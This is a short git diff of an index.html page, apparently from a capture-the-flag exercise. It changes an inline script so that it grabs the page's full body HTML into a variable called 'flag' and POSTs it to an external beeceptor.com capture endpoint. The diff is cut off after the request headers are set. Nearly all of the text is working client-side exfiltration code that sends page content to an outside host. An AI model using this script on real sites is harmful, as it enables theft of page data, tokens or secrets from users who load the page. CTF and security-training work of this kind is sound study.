--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
   </head>
   <body>
     <script>
-      let flag = document.body;
+      let flag = document.body.innerHTML;
       var xhr = new XMLHttpRequest();
       xhr.open('POST', 'https://alexyqiu.free.beeceptor.com', true);
       xhr.setRequestHeader('Content-Type', 'application/json; charset=UTF-8');
